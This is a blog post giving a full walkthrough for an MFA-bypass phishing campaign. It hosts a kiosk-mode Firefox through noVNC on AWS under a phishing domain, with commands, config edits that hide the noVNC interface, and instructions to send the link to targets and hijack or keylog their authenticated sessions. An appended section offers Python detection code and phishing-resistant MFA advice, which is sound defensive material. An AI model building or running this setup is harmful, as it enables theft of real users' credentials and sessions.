MFA Phishing using noVNC and AWS
Disclaimer: The information provided on this blog is for educational and informational purposes only. The author does not support or condone any illegal or unethical behaviour, including but not limited to hacking. By accessing this blog, you agree to use the information solely for lawful and ethical purposes.
As Identity and Access Management (IdAM) solutions actively attempt to detect multi-factor authentication (MFA) based phishing tools like Evilginx2, I began researching alternatives and came across an excellent blog article from MrD0x at https://mrd0x.com/bypass-2fa-using-novnc/. All credit for this technique goes to him. This article provides guidance on how to set up a working campaign using AWS.
The idea behind this technique is to phish a user into visiting a noVNC server that you control as an attacker, which runs a browser in kiosk mode. The user then accesses a legitimate service, such as Okta or O365, and enters their credentials, including MFA, into that remote browser. Because the authenticated session lives on your server, you can then kick the user and take over the session, keylog, or proxy all traffic.
EC2 Instance
Select an Ubuntu 22.04 LTS AMI with the t2.medium instance type, as a desktop streamed through noVNC is graphics intensive.
Security group
Add inbound rules for 22/tcp (SSH access to the instance) and 443/tcp (the noVNC server).
DNS Setup using Route53
Register your phishing domain and, in its hosted zone, create an A record pointing to the public IP of the EC2 instance you are running.
Setup certificate for TLS
sudo apt install certbot
sudo certbot certonly --standalone -d yourphishingdomain.com
Enter all the details to generate the certificate.
Make a note of where the certificate and key are stored, usually /etc/letsencrypt/live/yourphishingdomain.com/
Install Tigervnc
sudo apt update
sudo apt install tigervnc-standalone-server tigervnc-xorg-extension tigervnc-viewer
sudo apt install ubuntu-gnome-desktop
sudo systemctl enable gdm
sudo systemctl start gdm
Install dbus-x11
sudo apt install dbus-x11
There is a known blank-screen issue which can be fixed by uncommenting the following line in the /etc/gdm3/custom.conf file:
WaylandEnable=false
Setup VNC password
vncpasswd
Create a really long password with random characters. This will come in handy later.
Create ~/.vnc/xstartup
#!/bin/sh
# Start the GNOME 3 desktop inside the VNC session
[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r "$HOME/.Xresources" ] && xrdb "$HOME/.Xresources"
vncconfig -iconic &
# Run gnome-session under its own D-Bus instance (requires dbus-x11)
dbus-launch --exit-with-session gnome-session
Change permissions
chmod +x ~/.vnc/xstartup
Run vncserver
vncserver -depth 32 -geometry 2000x1000
Setup noVNC
git clone https://github.com/novnc/noVNC.git
Edit ./noVNC/vnc.html to modify the page title and make the following changes to remove the control bar and make the loading page white:
<div id="noVNC_control_bar_anchor" class="noVNC_vcenter" style="display:none;">
<div id="noVNC_status" style="display:none"></div>
<div id="noVNC_transition" style="background-color:white;color:white">
Copy the certificate and key previously generated to your home folder and then run:
sudo ./noVNC/utils/novnc_proxy --listen 443 --vnc 0.0.0.0:5901 --cert /home/ubuntu/cert/fullchain.pem --key /home/ubuntu/cert/privkey.pem
Install Firefox
wget -O ~/FirefoxSetup.tar.bz2 "https://download.mozilla.org/?product=firefox-latest&os=linux64"
sudo tar xjf ~/FirefoxSetup.tar.bz2 -C /opt/
sudo ln -s /opt/firefox/firefox /usr/bin/firefox
First, confirm that your setup is complete by accessing the noVNC server at https://yourphishingdomain.com/vnc.html?autoconnect=true&password=reallyreallylongpasswordwithrandomcharacters&resize=remote
Next, launch Firefox and set the homepage to the URL you want the user to visit (such as https://companyname.okta.com or https://login.microsoftonline.com).
Make sure automatic screen locking is disabled in the desktop settings.
Close Firefox and restart it in kiosk mode.
firefox --kiosk
You can now share the phishing link with your target user.
As the attacker, you can monitor the user’s session in your own browser, but be careful when clicking your mouse. Remember that the user has remote access to the machine, so ensure that appropriate lockdown steps have been taken and that the user cannot escape kiosk mode. This technique is best suited for spear phishing a small number of users and is not recommended for larger campaigns. If you are targeting multiple users, consider running multiple VNC servers on different ports.
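The following is an added, defender-side example and is not part of the original post. It turns two artefacts the post itself describes into detection logic: the shape of the link shared with the user (vnc.html with autoconnect, password and resize query parameters) and the noVNC element ids in vnc.html, which the cosmetic edits above hide with inline styles but leave in the served page. The proxy-log line format, the host names and the HTML snippet are constructed sample data, and the function names are my own.

```python
"""Defender-side detection of noVNC-hosted phishing pages (added example,
not part of the original post). Two checks:
  1. score_url  - does a URL look like a noVNC auto-connect link?
  2. score_html - does a fetched page carry noVNC's element ids?
All log lines, host names and HTML below are constructed sample data.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Query parameters noVNC's vnc.html reads; the post's link uses all three.
NOVNC_QUERY_KEYS = {"autoconnect", "password", "resize"}

# Element ids present in noVNC's vnc.html. The post hides or recolours them
# with inline styles, but the ids themselves stay in the served page.
NOVNC_MARKERS = ("noVNC_control_bar_anchor", "noVNC_status", "noVNC_transition")

# Constructed sample data. Host names are placeholders, not real sites.
SAMPLE_LOG = [
    "2024-01-01T09:00:01Z 10.0.0.12 GET https://login.microsoftonline.com/ 200",
    "2024-01-01T09:00:07Z 10.0.0.12 GET https://phish.example/vnc.html?autoconnect=true&password=longrandomstring&resize=remote 200",
    "2024-01-01T09:00:08Z 10.0.0.12 GET https://phish.example/core/rfb.js 200",
    "malformed line",
]
SAMPLE_HTML = """<html><head><title>Sign in</title></head><body>
<div id="noVNC_control_bar_anchor" class="noVNC_vcenter" style="display:none;"></div>
<div id="noVNC_status" style="display:none"></div>
<div id="noVNC_transition" style="background-color:white;color:white"></div>
</body></html>"""


def score_url(url):
    """Return the reasons a URL resembles a noVNC auto-connect link."""
    parts = urlsplit(url)
    reasons = []
    if parts.path.lower().endswith("vnc.html"):
        reasons.append("path ends with vnc.html")
    present = NOVNC_QUERY_KEYS & set(parse_qs(parts.query))
    if {"autoconnect", "password"} <= present:
        # The VNC password travelling in the link is the strongest tell:
        # a console a user opens deliberately rarely ships the secret this way.
        reasons.append("autoconnect with inline VNC password")
    elif present:
        reasons.append("noVNC query parameters: " + ", ".join(sorted(present)))
    return reasons


def score_html(body):
    """Return the noVNC element ids found in an HTML body."""
    return [m for m in NOVNC_MARKERS
            if re.search(r'id=["\']' + re.escape(m) + r'["\']', body)]


def scan_proxy_log(lines):
    """Yield (client_ip, url, reasons) for log lines whose URL scores.

    Constructed line format: <timestamp> <client_ip> <method> <url> <status>.
    """
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue  # skip malformed lines rather than abort the scan
        client_ip, url = fields[1], fields[3]
        reasons = score_url(url)
        if reasons:
            yield client_ip, url, reasons


if __name__ == "__main__":
    for client_ip, url, reasons in scan_proxy_log(SAMPLE_LOG):
        print(f"{client_ip} -> {url}: {'; '.join(reasons)}")
    print("noVNC markers in sample HTML:", score_html(SAMPLE_HTML))
```

noVNC is widely used for legitimate remote consoles, so a hit is a lead to triage rather than a verdict; allowlist your own console hosts and weight the inline-password case highest. A second signal follows directly from the setup described in the post: the user's sign-in to the real identity provider originates from the hosting instance's browser and IP rather than from the user's own device, which is what an identity-provider log review should look for. Because the credentials are typed into a browser running on a remote machine, authenticators bound to the user's physical device (FIDO2 security keys or platform authenticators) cannot complete a login there, which is why phishing-resistant MFA is the durable mitigation.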